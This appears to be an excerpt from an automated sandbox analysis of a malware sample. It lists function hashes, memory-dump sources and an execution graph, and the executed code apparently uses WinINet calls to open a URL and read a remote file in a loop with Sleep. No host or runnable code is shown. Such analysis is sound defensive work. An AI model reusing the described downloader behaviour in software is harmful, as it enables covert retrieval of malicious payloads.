                                                                • Instruction Fuzzy Hash: 9A6136B4E05219CFDB48CFAAD5915AEFBF2FF98310F10842AD415A7254D7389A11CF91
                                                                Function 069C4138 Relevance: 2.7, Strings: 2, Instructions: 164COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1519914929.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_69c0000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: \~$$or
                                                                • API String ID: 0-2796768027
                                                                • Opcode ID: 608a0296f4ea0f981a2cc6af69a92bbb8dbc8fbcb64fb09b3f0f3d18c366ee61
                                                                • Instruction ID: 2b679d7be7b5d71ce2f643e07906807df6692aee63f58dd34bba86fd88b16c2a
                                                                • Opcode Fuzzy Hash: 608a0296f4ea0f981a2cc6af69a92bbb8dbc8fbcb64fb09b3f0f3d18c366ee61
                                                                • Instruction Fuzzy Hash: BF613874E0521ACFDB48CFAAD5915AEFBF2EF98310F10842AD415A7294D7389A42CF91
                                                                Function 069C2A42 Relevance: 2.7, Strings: 2, Instructions: 152COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1519914929.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_69c0000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 18'$aY
                                                                • API String ID: 0-535677718
                                                                • Opcode ID: a6932ae128e9dabc89b34b17f998d18b8d4fc260a8ce0668a730b15dc6440dc8
                                                                • Instruction ID: 5f9f3522d5c7b86118a00b29835b71564daa679a9c45c3e9af1c4a1c265331d1
                                                                • Opcode Fuzzy Hash: a6932ae128e9dabc89b34b17f998d18b8d4fc260a8ce0668a730b15dc6440dc8
                                                                • Instruction Fuzzy Hash: 3061F8B4E0420ACFCB54CF99D5809AEFBB2FF88320F14891AD415A7754D7349A82CFA5
                                                                Function 069C3DF0 Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1519914929.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_69c0000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: i#)6
                                                                • API String ID: 0-3600651614
                                                                • Opcode ID: ae9e3c6178f15dca4d31f1bffe43680e8ad0383e975debd326ad7e4b4264bde0
                                                                • Instruction ID: 716f934d678a797c9e0d0e7241128b588cb325258c9423010644b846919f1bde
                                                                • Opcode Fuzzy Hash: ae9e3c6178f15dca4d31f1bffe43680e8ad0383e975debd326ad7e4b4264bde0
                                                                • Instruction Fuzzy Hash: 49410870E0520ADFDB88CFA6C5416AEFBF6EF89310F20D82A8105A7654D3349B418F96
                                                                Function 069C3DE0 Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1519914929.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_69c0000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: i#)6
                                                                • API String ID: 0-3600651614
                                                                • Opcode ID: 1f1cccd2c5f9be97eb897e56c88e5657448964bab9d1aad75c486396d6a5d658
                                                                • Instruction ID: 1d327e4a4d62f707c6727a0ccf0d29afb7177729740a285e03e1d926691102bd
                                                                • Opcode Fuzzy Hash: 1f1cccd2c5f9be97eb897e56c88e5657448964bab9d1aad75c486396d6a5d658
                                                                • Instruction Fuzzy Hash: C2413A71E0520ADFDB88CFA6C5416AEFBF2EF89310F24D82A8105B7654D3349B418F96
                                                                Function 069CD510 Relevance: .3, Instructions: 312COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1519914929.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_69c0000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 523fbbcee53a7724e9e454353405a154b683f880260011fc0250e02978b39e7e
                                                                • Instruction ID: 9b77824dac1ce6a2962d36705ce2cdb70cc336cdacd2c2fbffa7ed972d3a83f8
                                                                • Opcode Fuzzy Hash: 523fbbcee53a7724e9e454353405a154b683f880260011fc0250e02978b39e7e
                                                                • Instruction Fuzzy Hash: B9E109B4E002198FDB14DFA9C590AAEFBF2FF89315F248169D418AB355D730A942CF61
                                                                Function 069CD0D8 Relevance: .3, Instructions: 312COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1519914929.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_69c0000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 937e2264201fbeaed34d1cbbbf6bbb0a729d539e64824bc1ddce7c7ecb5bce24
                                                                • Instruction ID: 6d40faff7065e1e68b956be510685185eeefab6197881a21c3007c6f1e90fa29
                                                                • Opcode Fuzzy Hash: 937e2264201fbeaed34d1cbbbf6bbb0a729d539e64824bc1ddce7c7ecb5bce24
                                                                • Instruction Fuzzy Hash: 0CE11974E002198FDB14DFA8C590AAEFBF2FF89315F248169D408AB355D730A942CFA1
                                                                Function 069CED50 Relevance: .3, Instructions: 312COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1519914929.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_69c0000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f2856a9bda7c38255c4cd6eb4ba7f355618a03b84c3275504e748142f0ab3537
                                                                • Instruction ID: 5cef589dc08c9a705a327723e650078d3d5ed861d9e55de6276a4ea94f408134
                                                                • Opcode Fuzzy Hash: f2856a9bda7c38255c4cd6eb4ba7f355618a03b84c3275504e748142f0ab3537
                                                                • Instruction Fuzzy Hash: 7FE109B4E002198FDB14DFA8C580AAEFBF2FF89315F248169D415AB355D730A942CF65
                                                                Function 069CFB08 Relevance: .3, Instructions: 312COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1519914929.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_69c0000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9b3181370b622f81d926658fc16f7a1d7d4db1cce6999d8082f0cb86d63c8ff0
                                                                • Instruction ID: 3dc1a50b6023287f251d199124aa9fcd063f0babcf8bf52fe26d02f3f06fae77
                                                                • Opcode Fuzzy Hash: 9b3181370b622f81d926658fc16f7a1d7d4db1cce6999d8082f0cb86d63c8ff0
                                                                • Instruction Fuzzy Hash: AAE10974E002198FDB14DFA9C580AAEFBF2FF89315F248169D414AB356C730A942CFA5
                                                                Function 069CD948 Relevance: .3, Instructions: 312COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1519914929.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_69c0000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: afe91c32aa5414032e76929eb7254d1367a5558d36dfa90d9331a5af03d3f194
                                                                • Instruction ID: 15c89429d06264235ba7af1443d3a00d23cd94cea7ac86b0d0b1a8193633dfca
                                                                • Opcode Fuzzy Hash: afe91c32aa5414032e76929eb7254d1367a5558d36dfa90d9331a5af03d3f194
                                                                • Instruction Fuzzy Hash: 69E119B4E002198FDB14DFA8C590AAEFBF2FF89314F248169D414AB355D730A942CFA5
                                                                Function 04B77F28 Relevance: .3, Instructions: 269COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1515824403.0000000004B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4b70000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 958c38a6baaedc1778fb4bc07b9a3be5f58fe0810e1c6519e01cc92922bb2467
                                                                • Instruction ID: a43dabac365f076d18d05a994194fc480deda04f5427f7077fe8bb946d5a187a
                                                                • Opcode Fuzzy Hash: 958c38a6baaedc1778fb4bc07b9a3be5f58fe0810e1c6519e01cc92922bb2467
                                                                • Instruction Fuzzy Hash: 05D10331D2071A8ADB11EFA8D8916DDB7B1FF96300F10C79AE5093B214EB706AD5CB91
                                                                Function 009FE704 Relevance: .3, Instructions: 264COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1499606658.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_9f0000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d98155c1f9212e725c25f4bc37ccb9f6bc4df1d33e531af0e6769a4aee851792
                                                                • Instruction ID: d7a951bb8eba1d7fed7c167365cd8fe8681f69d8d5424657768467a9eb19387c
                                                                • Opcode Fuzzy Hash: d98155c1f9212e725c25f4bc37ccb9f6bc4df1d33e531af0e6769a4aee851792
                                                                • Instruction Fuzzy Hash: 9CA18F36E002198FCF09DFB4C8505AEB7B6FF84300B15457AE905AB266DB35ED56CB80
                                                                Function 04B77F38 Relevance: .3, Instructions: 264COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1515824403.0000000004B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4b70000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f95cb5b2b5fddc31b76f086f826a4a22d3534fcec71b982087d5c5f45bac63eb
                                                                • Instruction ID: 6dd7676cee60340b5f8103213bd2503bf4e3cac5d9ed4b77fe68218354f36691
                                                                • Opcode Fuzzy Hash: f95cb5b2b5fddc31b76f086f826a4a22d3534fcec71b982087d5c5f45bac63eb
                                                                • Instruction Fuzzy Hash: 16D1F331D2071A8ADB11EFA8D8916DDB7B1FF96300F10C79AE4093B214EB706AD5CB91
                                                                Function 0699ED20 Relevance: .2, Instructions: 177COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1519169052.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_6990000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b2c0ca6eeb749fb6843f770beb21cfcf411bc3896f1f01b1a6e735429fd45bbb
                                                                • Instruction ID: ba3c22fe578da57a1c8ef044bcc1f2e55f4b238526018cd41e85a848af4f67f2
                                                                • Opcode Fuzzy Hash: b2c0ca6eeb749fb6843f770beb21cfcf411bc3896f1f01b1a6e735429fd45bbb
                                                                • Instruction Fuzzy Hash: 4371F6B4E0520ADFDB44CF99D4809AEFBB6FF88310F14856AD415A7714D3349A41CFA4
                                                                Function 069C32F8 Relevance: .2, Instructions: 167COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1519914929.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_69c0000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d4470264b868eea1e3910818e539adf6c4de9123e4d3f0036b844548b48aeee9
                                                                • Instruction ID: 48045ba9556e574cf0317ba518178cd32536bbe3133330a062982d17e0f04deb
                                                                • Opcode Fuzzy Hash: d4470264b868eea1e3910818e539adf6c4de9123e4d3f0036b844548b48aeee9
                                                                • Instruction Fuzzy Hash: 41710474E05209DFDB44CFA9C5809DEFBF2FF89220F68982AD415B7714D7309A418B69
                                                                Function 069C32E8 Relevance: .2, Instructions: 166COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1519914929.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_69c0000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c83870a69144124126b8b4f339659430d218e4e0920ad2ada6023968cf9e6c5e
                                                                • Instruction ID: 68427ae1136fc5f3edcda89f0dbad2704176daf6fc267c21f7a82c2708b01f88
                                                                • Opcode Fuzzy Hash: c83870a69144124126b8b4f339659430d218e4e0920ad2ada6023968cf9e6c5e
                                                                • Instruction Fuzzy Hash: 04610374E052098FDB44CFAAC5809DEFBF2FF89220F68942AD415F7614D7349A418BA9
                                                                Function 069CD0B8 Relevance: .1, Instructions: 137COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1519914929.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_69c0000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 74c52a9756f5e58575a8cdae71da27177723ed39e091d2d583eae3558349173d
                                                                • Instruction ID: 4b5f016d310e069e24d20b495ea7dd338d84df1d9dfc43167401d5399ee9a54c
                                                                • Opcode Fuzzy Hash: 74c52a9756f5e58575a8cdae71da27177723ed39e091d2d583eae3558349173d
                                                                • Instruction Fuzzy Hash: A8512CB0E042198FDB14DFA9C5905AEFBF2FF89314F24816AD418AB356D7309942CFA1
                                                                Function 069CFAFA Relevance: .1, Instructions: 137COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1519914929.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_69c0000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6ead4ff4f32500372c95bf05e9e6c08e0973be7d2afc8354f00ffed95cf08d1e
                                                                • Instruction ID: 252590148cc3479fc03fde0dbc3d235b2b2d2f02728669d1867fdb4fcca505d1
                                                                • Opcode Fuzzy Hash: 6ead4ff4f32500372c95bf05e9e6c08e0973be7d2afc8354f00ffed95cf08d1e
                                                                • Instruction Fuzzy Hash: DC511A70E002198FDB14CFA9C9805AEFBF6FF89314F24856AD418AB356D7309942CFA1
                                                                Function 069C4590 Relevance: .1, Instructions: 135COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1519914929.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_69c0000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c6194f2c6a4c6fcd49adace7a2b85e13cf997a1568cbfdab17ed1a2ab707620b
                                                                • Instruction ID: fd3a5b3f838f7b4354dd9bdcc09610fa6f48eeea2a476284b24820f2024ce2f4
                                                                • Opcode Fuzzy Hash: c6194f2c6a4c6fcd49adace7a2b85e13cf997a1568cbfdab17ed1a2ab707620b
                                                                • Instruction Fuzzy Hash: DB512974E04619DFDF44CFA6D4501EEFBF2EF89650F10982AC415B7214E3388A018FAA
                                                                Function 069C4580 Relevance: .1, Instructions: 133COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1519914929.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_69c0000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9fd57892ba1d9e8b65004eb720ff673531da5c33a8bcb65f1a0c64498ee67278
                                                                • Instruction ID: ee41a619bfe2d6862b52f1fe761b7978a79f96e26272c697dc84d1b0aaff1a49
                                                                • Opcode Fuzzy Hash: 9fd57892ba1d9e8b65004eb720ff673531da5c33a8bcb65f1a0c64498ee67278
                                                                • Instruction Fuzzy Hash: CC514874E04619DFDF44CFA6D4505EEFBF2EF89650F10982AC015B7614E33896028FA6
                                                                Function 0699E8D8 Relevance: .1, Instructions: 127COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1519169052.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_6990000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e05a3bc8e9da031b0f8b63f0f55880581d69379011ce9048a3ef17466aa436d9
                                                                • Instruction ID: 8acc5407b1c6275a659a9ba0ac09310f4c39bba993ebe72ac620d525d3d8e77a
                                                                • Opcode Fuzzy Hash: e05a3bc8e9da031b0f8b63f0f55880581d69379011ce9048a3ef17466aa436d9
                                                                • Instruction Fuzzy Hash: 065123B0E052099FEB48CFAAC9806AEFBF2FF89311F24D56AD419A7250D7344941CF65
                                                                Function 069C30D8 Relevance: .1, Instructions: 107COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1519914929.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_69c0000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b4d78dfec3b97962b6720f91f3004308e20117b4bc8985a6f68c9d65d250940e
                                                                • Instruction ID: 107ce5102080c426dae85a6520e3bce8afc6d6c6d2854f46039b524bff51f4f7
                                                                • Opcode Fuzzy Hash: b4d78dfec3b97962b6720f91f3004308e20117b4bc8985a6f68c9d65d250940e
                                                                • Instruction Fuzzy Hash: D84105B0E0520A9FDB44CFAAC5815EEFBF2FB88310F20D42AC415A7614D7349A42CFA5
                                                                Function 069C30C8 Relevance: .1, Instructions: 104COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1519914929.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_69c0000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fd14922770235682075da675e4564c24ba831952deb770c1ff53fd6f46c8d841
                                                                • Instruction ID: 150af80ee44692c3109a5d06e1b8d054d8392e9bea433bec987e34df55c13aa6
                                                                • Opcode Fuzzy Hash: fd14922770235682075da675e4564c24ba831952deb770c1ff53fd6f46c8d841
                                                                • Instruction Fuzzy Hash: 154116B4E0420A9FDB44CFAAC5805AEFBB2FF88310F24C56AC415A7655D7349A42CF95

                                                                Execution Graph

                                                                Execution Coverage:16.1%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:21.9%
                                                                Total number of Nodes:32
                                                                Total number of Limit Nodes:3
                                                                execution_graph 14428 4322b0 14430 4322d3 14428->14430 14429 4330d6 14430->14429 14433 438f70 14430->14433 14432 432f26 14435 438f93 14433->14435 14434 43a505 Sleep 14437 43a51c 14434->14437 14435->14434 14439 439785 14435->14439 14436 43a79d 14436->14432 14437->14436 14440 43ac40 14437->14440 14439->14432 14442 43acee 14440->14442 14441 43b097 14441->14436 14442->14441 14444 438c80 14442->14444 14445 438cd2 InternetOpenA 14444->14445 14447 438d56 14445->14447 14448 438d93 InternetOpenUrlA 14447->14448 14451 438d9e 14447->14451 14448->14451 14449 438ef4 14449->14441 14450 438e3d InternetReadFile 14450->14451 14451->14449 14451->14450 14452 431fd0 14454 431ff3 14452->14454 14453 43221e 14454->14453 14455 43ac40 3 API calls 14454->14455 14455->14454 14456 43975f 14457 43a864 14456->14457 14459 439770 14456->14459 14458 43a505 Sleep 14461 43a51c 14458->14461 14459->14458 14463 439785 14459->14463 14460 43a79d 14461->14460 14462 43ac40 3 API calls 14461->14462 14462->14460

                                                                Executed Functions

                                                                Function 00438C80 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 236networkfileCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1522 438c80-438cd8 1524 438cea-438cfe 1522->1524 1525 438cda-438cdf 1522->1525 1527 438d00-438d08 1524->1527 1528 438d0f-438d22 1524->1528 1525->1524 1527->1528 1530 438d33-438d76 InternetOpenA 1528->1530 1531 438d24-438d2c 1528->1531 1536 438db8-438dbd 1530->1536 1537 438d78-438d9a InternetOpenUrlA 1530->1537 1531->1530 1538 438dc3-438e12 1536->1538 1539 438ef7-438f4e 1536->1539 1543 438d9e-438daf 1537->1543 1555 438e1b-438e20 1538->1555 1543->1536 1556 438e26-438eb3 InternetReadFile 1555->1556 1557 438ef4 1555->1557 1567 438eba-438ee3 1556->1567 1557->1539 1567->1555 1572 438ee9-438eef 1567->1572 1572->1555
                                                                APIs
                                                                • InternetOpenA.WININET(00000000), ref: 00438D47
                                                                • InternetOpenUrlA.WININET(00000000,00000000,?,00000000,00000000,04000000,00000000), ref: 00438D95
                                                                • InternetReadFile.WININET(?,00000000), ref: 00438E42
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2715154991.0000000000430000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000009.00000002.2715154991.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2715154991.0000000000402000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2715154991.0000000000408000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2715154991.0000000000419000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2715154991.000000000041B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2715154991.000000000041D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2715154991.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2715154991.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2715154991.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2715154991.0000000000470000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID: Internet$Open$FileRead
                                                                • String ID: 0@$ 0@$@1@
                                                                • API String ID: 72386350-1513703003
                                                                • Opcode ID: 7415e31c1dd04fe2de18ba759fdf0a985b696cbe0993a8cab25e4e2be1fd282a
                                                                • Instruction ID: d950c7b9680cd67c1e5b0a3c7eb9cc8a2ad6d8f2bba4ef8075b4d3067f98126b
                                                                • Opcode Fuzzy Hash: 7415e31c1dd04fe2de18ba759fdf0a985b696cbe0993a8cab25e4e2be1fd282a
                                                                • Instruction Fuzzy Hash: E181DC71900209AFDB04EBE5DD85EEEBBBDEF88704F10811AF605B72A0DA745945CFA4
                                                                Function 00438F70 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 1669COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 2053 438f70-4390ec call 433fd0 call 4330e0 2073 4391a2-43925f call 433fd0 call 4330e0 2053->2073 2074 4390f2-43919f call 433fd0 call 4330e0 2053->2074 2093 439261-43926b 2073->2093 2094 43926d-439273 2073->2094 2074->2073 2095 439279-4393be call 433fd0 call 4330e0 2093->2095 2094->2095 2117 4393c0-4393ca 2095->2117 2118 4393cc-4393d2 2095->2118 2119 4393d8-439515 call 433fd0 call 4330e0 2117->2119 2118->2119 2136 439523-439529 2119->2136 2137 439517-439521 2119->2137 2138 43952f-439688 call 433fd0 call 4330e0 2136->2138 2137->2138 2156 439696-43969c 2138->2156 2157 43968a-439694 2138->2157 2158 4396a2-43977f 2156->2158 2157->2158 2168 43a3f6-43a405 2158->2168 2169 439785-4398a2 call 433fd0 call 4330e0 call 433fd0 call 4330e0 2158->2169 2170 43a505-43a634 Sleep call 433fd0 call 4330e0 2168->2170 2171 43a40b-43a4d5 call 433fd0 call 4330e0 call 4382d0 2168->2171 2232 4398b0-4398b6 2169->2232 2233 4398a4-4398ae 2169->2233 2226 43a63a-43a798 call 433fd0 call 4330e0 call 438840 call 433fd0 call 4330e0 call 43ac40 2170->2226 2227 43a7cc-43a84e 2170->2227 2219 43a4da-43a502 2171->2219 2219->2170 2293 43a79d-43a7c9 2226->2293 2236 4398bc-439a2f call 43a870 call 433fd0 call 4330e0 call 433fd0 call 4330e0 2232->2236 2233->2236 2285 439a31-439a3b 2236->2285 2286 439a3d-439a43 2236->2286 2287 439a49-439bbc call 43a870 call 433fd0 call 4330e0 call 433fd0 call 4330e0 2285->2287 2286->2287 2317 439bca-439bd0 2287->2317 2318 439bbe-439bc8 2287->2318 2293->2227 2319 439bd6-439d48 call 43a870 call 433fd0 call 4330e0 call 433fd0 call 4330e0 2317->2319 2318->2319 2345 439d56-439d5c 2319->2345 2346 439d4a-439d54 2319->2346 2347 439d62-439ed5 call 43a870 call 433fd0 call 4330e0 call 433fd0 call 4330e0 2345->2347 2346->2347 2373 439ee3-439ee9 2347->2373 2374 439ed7-439ee1 2347->2374 2375 439eef-43a062 call 43a870 call 433fd0 call 4330e0 call 433fd0 call 4330e0 2373->2375 2374->2375 2401 43a070-43a076 2375->2401 2402 43a064-43a06e 2375->2402 2403 43a07c-43a1ee call 43a870 call 433fd0 call 4330e0 call 433fd0 call 4330e0 2401->2403 2402->2403 2429 43a1f0-43a1fa 2403->2429 2430 43a1fc-43a202 2403->2430 2431 43a208-43a37b call 43a870 call 433fd0 call 4330e0 call 433fd0 call 4330e0 2429->2431 2430->2431 2457 43a389-43a38f 2431->2457 2458 43a37d-43a387 2431->2458 2459 43a395-43a3aa call 43a870 2457->2459 2458->2459 2462 43a3af-43a3f1 2459->2462
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2715154991.0000000000430000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000009.00000002.2715154991.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2715154991.0000000000402000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2715154991.0000000000408000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2715154991.0000000000419000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2715154991.000000000041B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2715154991.000000000041D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2715154991.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2715154991.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2715154991.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2715154991.0000000000470000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 00@$@]@$@]@$@]@
